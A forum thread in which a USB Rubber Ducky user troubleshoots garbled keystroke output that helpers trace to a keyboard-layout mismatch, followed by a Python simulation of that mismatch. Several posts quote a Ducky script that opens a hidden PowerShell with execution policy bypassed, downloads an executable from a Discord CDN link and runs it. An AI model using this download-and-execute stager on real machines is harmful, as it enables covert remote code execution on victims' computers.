randomblueshark Posted January 9, 2021

Hello, I'm a newb to the USB Rubber Ducky. I received mine 4 days ago for pen testing, and I have a small problem with the STRING code. Here is the code below that I used.

DELAY 200
CONTROL ESCAPE
DELAY 300
STRING run
DELAY 100
ENTER
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/777729234181029919/796873244677242910/calc.exe',\"$env:temp\calc.exe\"); Start-Process \"$env:temp\calc.exe\""
ENTER

When executed in notepad.exe, I get this code with a lot of @ and #

powershell -NoP -NonI -W Hidden -Exec Bypass @IEX (New-Object System.Net.WebClient).DownloadFile(<https:##cdn.discordapp.com#attachments#777729234181029919#796873244677242910#calc.exe<,@$env:tempbob.exe@); Start-Process @$env:tempbob.exe@@

What am I doing wrong? Can someone help?

chrizree Posted January 9, 2021

It seems as if you need to specify a keyboard language when creating the payload/inject.bin - is the "victim" anything else than US keyb layout?

chrizree Posted January 10, 2021

What method are you using to create the inject.bin file?

randomblueshark Posted January 10, 2021 (Author)

I own a Corsair K70 keyboard.

Everything looks good using the ca-fr.json on https://shop.hak5.org/pages/ducky-encoder except one thing: the USB Rubber Ducky does not recognize this key ---> "
The Ducky replaces it with this key ---> \

powershell -NoP -NonI -W Hidden -Exec Bypass \IEX (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/777729234181029919/797350378844848148/calc.exe',\\$env:temp\12345.exe\\); Start-Process \\$env:temp\12345.exe\\\

After the execution, the code is missing a lot of "

The Ducky must click on Shift and this one surrounded in red, but it clicks on Shift + \, the left key beside the 1 key.

Original code

STRING powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/777729234181029919/797350378844848148/calc.exe',\"$env:temp\12345.exe\"); Start-Process \"$env:temp\12345.exe\""

chrizree Posted January 10, 2021

So, even if something is still not correct, something has changed between your first and last post; @ has become \, what did you change? Forward slashes / also seem to have been changed to now be correct (was previously the # char in the first post), also < seems to be correct as it's ' in the latest example of your output.

Also not sure what keyboard layout you have in the screenshot of your On-Screen Keyboard. I configured one of my Windows 10 boxes for Canadian French and Canadian-French (Legacy) and none of them showed the mapping you have captured in your screenshot.

Your physical keyboard doesn't matter, btw.

I used the chars that give you problems with other keyboard layouts and I have no problems running my payloads that contain those chars. Perhaps the ca-fr.json language map file isn't all correct?

randomblueshark Posted January 10, 2021 (Author)

Ok, I figured out why it's doing that: my keyboard is US... now it's working, the code works on my main OS system. Thanks for the help anyway.
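
The layout mismatch this thread ends on, as a small simulation added here (it is not code from any poster or from Hak5): a USB keyboard sends key positions plus modifiers, not characters, so text encoded for one layout is decoded by whatever layout the host has active. The partial layout tables and function names are constructed for this example, and it assumes Canadian French places `"`, `/` and `'` on Shift+2, Shift+3 and Shift+comma.

```python
# A HID keyboard report carries a modifier byte and a key-position usage ID.
# The encoder chooses positions from ITS layout; the host decodes with ITS own.
SHIFT = 0x02  # left-shift bit in the HID modifier byte

# Constructed, partial layout maps: character -> (modifier, HID usage ID).
# Letters and space sit on the same positions in both QWERTY layouts.
LETTERS = {c: (0, 0x04 + i) for i, c in enumerate("abcdefghijklmnopqrstuvwxyz")}
COMMON = {**LETTERS, " ": (0, 0x2C)}

US = {**COMMON,
      '"': (SHIFT, 0x34), "'": (0, 0x34), "/": (0, 0x38),
      "@": (SHIFT, 0x1F), "#": (SHIFT, 0x20), "<": (SHIFT, 0x36)}

# Assumption: Canadian French mapping for the three characters in the thread.
CA_FR = {**COMMON,
         '"': (SHIFT, 0x1F), "/": (SHIFT, 0x20), "'": (SHIFT, 0x36)}


def encode(text, layout):
    """Key positions an encoder would emit for `text` under `layout`."""
    return [layout[ch] for ch in text]


def decode(reports, layout):
    """Characters a host produces when it reads `reports` with `layout`."""
    reverse = {pos: ch for ch, pos in layout.items()}
    return "".join(reverse.get(r, "?") for r in reports)


def mismatches(text, encoder_layout, host_layout):
    """Return the typed text and the (intended, typed) pairs that differ."""
    typed = decode(encode(text, encoder_layout), host_layout)
    return typed, sorted({(a, b) for a, b in zip(text, typed) if a != b})


if __name__ == "__main__":
    sample = 'say "it\'s a/b"'  # constructed sample text
    typed, diffs = mismatches(sample, CA_FR, US)
    print(typed)
    for intended, got in diffs:
        print(f"{intended!r} arrived as {got!r}")
```

With the encoder set to Canadian French and the host on US, the three substitutions match the first post's output: `"` becomes `@`, `/` becomes `#` and `'` becomes `<`.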
This topic is now archived and is closed to further replies.